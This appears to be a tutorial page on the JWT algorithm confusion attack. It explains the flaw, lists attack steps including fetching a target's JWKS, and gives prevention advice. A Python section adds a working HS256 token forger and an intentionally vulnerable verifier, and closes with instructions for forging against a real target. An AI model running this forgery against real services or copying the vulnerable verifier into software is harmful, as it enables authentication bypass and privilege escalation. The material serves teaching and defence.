JWT Algorithm Confusion Attack

JWT Algorithm Confusion (also called Key Confusion or Algorithm Substitution) is an attack in which the attacker changes the token's "alg" header from an asymmetric algorithm (such as RS256) to a symmetric one (HS256) and signs the token with the server's public key as the HMAC secret. If the server's verification code hands that same public key to an HMAC check, the forged signature validates.

How It Works

When an application uses RS256, it signs with a private key and verifies with the public key. The public key is not secret. If the verification code takes the algorithm from the token's own header and passes the public key to whichever branch the header selects, an attacker can:

  1. Obtain the public key (often publicly available, e.g. from a JWKS endpoint)
  2. Change the algorithm header to HS256
  3. Sign the token using the public key bytes as the HMAC secret
  4. The server's HS256 branch uses the same public key as the secret, so the signature matches

Example

// Original token (RS256)
{"alg": "RS256", "typ": "JWT"}
{"sub": "user", "admin": false}
[signature with private key]

// Forged token (HS256)
{"alg": "HS256", "typ": "JWT"}
{"sub": "user", "admin": true}
[HMAC signature using public key as secret]

// Vulnerable server verifies:
HMAC_verify(token, public_key) == signature ✓

Attack Steps

// 1. Get public key
curl https://target.com/.well-known/jwks.json

// 2. Convert to the representation the server uses (PEM, DER or raw JWK)
//    The HMAC secret must be byte-for-byte what the server passes to verify(),
//    so a PEM with and without a trailing newline are different secrets; try each
// 3. Modify token claims
// 4. Sign with: HMAC-SHA256(header.payload, public_key_bytes)

Prevention

  • Fix the expected algorithm in the verification call (an explicit allow-list such as ["RS256"]); never take it from the token header
  • Keep symmetric secrets and asymmetric keys in separate, typed objects so a public key can never be handed to an HMAC routine
  • Reject tokens whose algorithm does not match the one configured for that key
  • Use a maintained JWT library and keep it updated; current versions require an explicit algorithm list and most refuse to use an asymmetric key with HS256
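Added example, not code from the original page: the attack steps above and the first two prevention points, carried through in working Python. It forges an HS256 token keyed with the server's public key, shows a verifier that trusts the token's "alg" header accepting it, shows a verifier with a fixed algorithm rejecting it, and shows the byte-representation caveat (same key, no trailing newline, different HMAC). PUBLIC_KEY_PEM is a constructed placeholder, not a real key; the RS256 branch is intentionally not implemented because a forged token never reaches it. Standard library only.

```python
"""Algorithm-confusion forgery and the two verifier behaviours it depends on.
Standard library only; runs offline."""
import base64
import hashlib
import hmac
import json

# Constructed placeholder for the target's RSA public key (not a real key).
# The attack only depends on the attacker using exactly the bytes the server
# hands to its verify() call: PEM, DER or JWK, trailing newline included.
PUBLIC_KEY_PEM = (
    "-----BEGIN PUBLIC KEY-----\n"
    "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA...constructed placeholder...\n"
    "-----END PUBLIC KEY-----\n"
)


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def forge_hs256(claims: dict, secret: bytes) -> str:
    """Attacker side: header says HS256, signature is HMAC-SHA256 keyed with
    `secret` (here, the server's public key bytes)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode()
    tag = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(tag)}"


def verify_rs256(signing_input: bytes, signature: bytes, public_key_pem: str) -> bool:
    # RSASSA-PKCS1-v1_5 verification is deliberately left out of this example
    # (it needs an RSA implementation); a forged HS256 token never reaches it.
    raise NotImplementedError("RS256 check omitted; not needed to show the confusion")


def verify_vulnerable(token: str, key: str) -> dict:
    """Vulnerable server: trusts the token's own `alg` header and passes the one
    `key` argument (the public key PEM) to whichever branch the header selects."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    signing_input = f"{header_b64}.{payload_b64}".encode()
    signature = b64url_decode(sig_b64)
    if header.get("alg") == "HS256":
        # The public key PEM text becomes the HMAC secret: this is the bug.
        expected = hmac.new(key.encode(), signing_input, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, signature):
            raise ValueError("bad HMAC")
    elif header.get("alg") == "RS256":
        if not verify_rs256(signing_input, signature, key):
            raise ValueError("bad RSA signature")
    else:
        raise ValueError("unsupported alg")
    return json.loads(b64url_decode(payload_b64))


def verify_hardened(token: str, public_key_pem: str, expected_alg: str = "RS256") -> dict:
    """Fixed server: the algorithm is fixed in code, the header may only agree
    with it, and the public key is only ever handed to the RSA verifier."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != expected_alg:
        raise ValueError(f"unexpected alg {header.get('alg')!r}, want {expected_alg}")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    if not verify_rs256(signing_input, b64url_decode(sig_b64), public_key_pem):
        raise ValueError("bad RSA signature")
    return json.loads(b64url_decode(payload_b64))


def is_accepted(verify, token: str, key: str) -> bool:
    """True if `verify` returns claims, False if it rejects the token."""
    try:
        verify(token, key)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    forged = forge_hs256({"sub": "user", "admin": True}, PUBLIC_KEY_PEM.encode())
    print(forged)
    print("vulnerable accepts:", is_accepted(verify_vulnerable, forged, PUBLIC_KEY_PEM))  # True
    print("hardened accepts:", is_accepted(verify_hardened, forged, PUBLIC_KEY_PEM))      # False
    # Same key, different byte representation (no trailing newline): different HMAC.
    near_miss = forge_hs256({"sub": "user", "admin": True}, PUBLIC_KEY_PEM.rstrip("\n").encode())
    print("vulnerable accepts near-miss:", is_accepted(verify_vulnerable, near_miss, PUBLIC_KEY_PEM))  # False
```

Against a real target, replace PUBLIC_KEY_PEM with the exact key material the server loads and keep forging with each candidate representation until one validates; the near-miss case is why a first attempt often fails even when the server is vulnerable. With a library such as PyJWT the hardened behaviour is the explicit algorithms list, e.g. jwt.decode(token, public_key, algorithms=["RS256"]), which is what the first prevention point asks for.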

PentesterLab Exercises

See Also